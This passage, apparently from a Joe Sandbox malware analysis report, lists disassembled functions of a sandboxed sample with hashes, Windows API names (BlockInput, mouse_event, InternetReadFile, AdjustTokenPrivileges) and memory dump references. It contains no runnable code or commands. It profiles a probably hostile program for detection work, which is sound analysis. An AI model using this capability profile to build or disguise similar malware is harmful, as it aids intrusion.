                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                      • Instruction ID: 285dc57747dc1e61d13f67b51e48823691b2c7202edb84936267720fb93de441
                                                                      • Opcode Fuzzy Hash: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                      • Instruction Fuzzy Hash: 94315912B186D144EB20BF7698046BAE6A1FB50BF4F888635EE6D87BC4DF3CE4418350
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfomouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 17014623-711622031
                                                                      • Opcode ID: 5b704a07574124c7e817457ac83024f80addd9552f4bff182079f39b1e753b8c
                                                                      • Instruction ID: f467cecd1e5c82830557a32f571ec8747fcf0111687ae7f940eb13c28bc74be7
                                                                      • Opcode Fuzzy Hash: 5b704a07574124c7e817457ac83024f80addd9552f4bff182079f39b1e753b8c
                                                                      • Instruction Fuzzy Hash: FA218E32A48A5A81EB14FF26E51027AA360FB84BA4F844035DE6DC7795DF7CF4828790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                      • Instruction ID: a3698ea1fd680f7f829b72bc5c9d999335cff17f5c44841cdecd9231e871be1a
                                                                      • Opcode Fuzzy Hash: c9c219a70f1c370a867d1a9527945e6bdb48ca94d3a7acfc6404a472547bc866
                                                                      • Instruction Fuzzy Hash: B2118176B48B8182EB10EF26E08436DB760FB88BA4F458631DB6D87791CF7CE4518790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                      • Instruction ID: c497a3667b32e5eed545331a63da7c8bcb93e0c8022b2e704be7d4b05ff8e366
                                                                      • Opcode Fuzzy Hash: a2008fc71fb315c0dad007a4b51d1fe3c27baf42b183b088b3737ee8cb1df6e2
                                                                      • Instruction Fuzzy Hash: 46F0A46270CB4241E7206F25F40426AE2A5FFC87A4F944134EB9D82BA9DF3CD0448B50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: 3b88351c3c8e07ec62d96cf7e52e6b55e92c273785c5c0fd5bcb4e6ff751a6f7
                                                                      • Instruction ID: 744f4ae347bfec7c3fdd7e0e77500500250cfa37a90e6508b7f46d978010155a
                                                                      • Opcode Fuzzy Hash: 3b88351c3c8e07ec62d96cf7e52e6b55e92c273785c5c0fd5bcb4e6ff751a6f7
                                                                      • Instruction Fuzzy Hash: 2DF0A0A6A58A4582FB11EF21D4153B99360FBD8FA8F600531CE0D8A354CF6CE08682A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 101623796-0
                                                                      • Opcode ID: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                      • Instruction ID: c5ad1569a05fdf12a8177e73a6a19ab2ef7008aabba2fe5cd6366768475fcde5
                                                                      • Opcode Fuzzy Hash: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                      • Instruction Fuzzy Hash: 92219262B4978282FA64FE11A0147B9A350FB85B94FC85135DA4C87B85DF3CF602CB94
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                      • Instruction ID: 6861f26571afda57bb6a14953ebbf77d35776667f4858ddf73f2e33c14996edc
                                                                      • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                      • Instruction Fuzzy Hash: 96E0653275870686EB44BF61E04027AA290AB94F94F545035DA1EC3345DF7CE4D08750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                      • Instruction ID: a488cb5aee4bf9a6f07bc9b8ab7d2e878160d6c4841cfd23a07c716d326e9bf9
                                                                      • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                      • Instruction Fuzzy Hash: F2C01271614662D9E760EF24DC882DC3330F70072CFC01121E60A4E9689FB89248C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: cf50d128dd3344e2a26665cf24b57cc892866eab895f7b642e8f36e24e0f0ced
                                                                      • Instruction ID: ec9ebcfb0c08ba5791db86bec783d12e8e625f7c56e4029a3ade98ba62c47e01
                                                                      • Opcode Fuzzy Hash: cf50d128dd3344e2a26665cf24b57cc892866eab895f7b642e8f36e24e0f0ced
                                                                      • Instruction Fuzzy Hash: BEB09220E0BA02C2EA093F116C8A21463A4BF48B20FD84139C00CC0330DF2C30EA5770
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                      • Instruction ID: 181c493fb12b0e485c598375630e246999689faff7e7edcc1f96982b4c1925b9
                                                                      • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                      • Instruction Fuzzy Hash: 9DF06871B682A58AEB94DF2CA44262977D0F74C3D0F909039D68DC3F44DB3C95949F54
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                      • Instruction ID: 6c771b558d193ff37ba8f7ad61812f2e717806132c4754a48d63a39cadc01bcb
                                                                      • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                      • Instruction Fuzzy Hash: 35A0012694E902D4E606AF04A854031A220AB91724BD10532D11D866619FBDB480C2A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: cf82231de9513dfa3aaa851f98872d3f79157a14b5940c6e9e999cb2d713e7b9
                                                                      • Instruction ID: 6e9517cab7ca5b8701db72dd65c037b95cfc110114f104593f4a293f7e2094d2
                                                                      • Opcode Fuzzy Hash: cf82231de9513dfa3aaa851f98872d3f79157a14b5940c6e9e999cb2d713e7b9
                                                                      • Instruction Fuzzy Hash: 08A1A532F08A028AEB15AF65954457DA761BB88B78F904334DE2E93794DF7CF48487A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                      • Instruction ID: c13be67a1f41d2a8e722334aaf4b45b42f50d9fe079b1279673abcd52b3939c3
                                                                      • Opcode Fuzzy Hash: 94db47e06bd0190674c94e1b1137c27149ea748c604d997c0ecd6c7b010eced7
                                                                      • Instruction Fuzzy Hash: 94B13E22B4DB0694EA54BF25D84017CA371FB407A4BE85136D90E877A9DF2CF989C3A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 948d1c02ea9e6d2372b4c97d423fc7df0122985af9fee021215e5cafd4e8bea9
                                                                      • Instruction ID: 8e68e26474755fb93dc115fd489c185f4a759a6fcce7362b1074a0e4de35517b
                                                                      • Opcode Fuzzy Hash: 948d1c02ea9e6d2372b4c97d423fc7df0122985af9fee021215e5cafd4e8bea9
                                                                      • Instruction Fuzzy Hash: B6717236A0CA4186E725AF25E84467AB361FB89BB4F804334DD5E87B94DF7CF4848790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: tooltips_class32
                                                                      • API String ID: 698492251-1918224756
                                                                      • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                      • Instruction ID: f6f73757f97da96859e5d984012ec6eec646e66628527aca5b4442c5ad4487d3
                                                                      • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                                      • Instruction Fuzzy Hash: 3CC12072B087418AE714EF65E4442AEB7A0FB88BA8F904035EA5D87B64DF78F485C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                      • String ID: @
                                                                      • API String ID: 3869813825-2766056989
                                                                      • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                      • Instruction ID: 87ce4185a6d6c635fc7c9576086263cf63f771a7c0a6ed87c5301c883204cff7
                                                                      • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                                      • Instruction Fuzzy Hash: 6F81AC32A08A4286E701EF75D85466D77B0FB44FA8F808135CE0EA7758DF38E985C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongWindow$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 554392163-0
                                                                      • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                      • Instruction ID: 7c647caf012ee31b9886b0f109ce3ae00b8e5af7ad7ee91d6e534ac967bb1ab6
                                                                      • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                      • Instruction Fuzzy Hash: 0681D831E4C95642EA31BF25944827AA391BF85B74FD50635CA5D833E4DF3CB88287D0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 222038402-1459072770
                                                                      • Opcode ID: 8c755c0fc64d6d4bda2231876f2c678180d8bec7320acdc058a860b754f6bdd3
                                                                      • Instruction ID: 2c307c3fe056c13452f5ae8926ebd77fd19d67b60a6879611f5bbf72122e7891
                                                                      • Opcode Fuzzy Hash: 8c755c0fc64d6d4bda2231876f2c678180d8bec7320acdc058a860b754f6bdd3
                                                                      • Instruction Fuzzy Hash: FF516A6164C64286EE14FF2A95041B9A391AF85FE0FC04531EE0E8BB96DF3DF54183A4
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                      • Instruction ID: 72926d057f16b8fed354cf0c75a8e16cf9ccbe2c14dbc2ebf4f316a96f45abe2
                                                                      • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
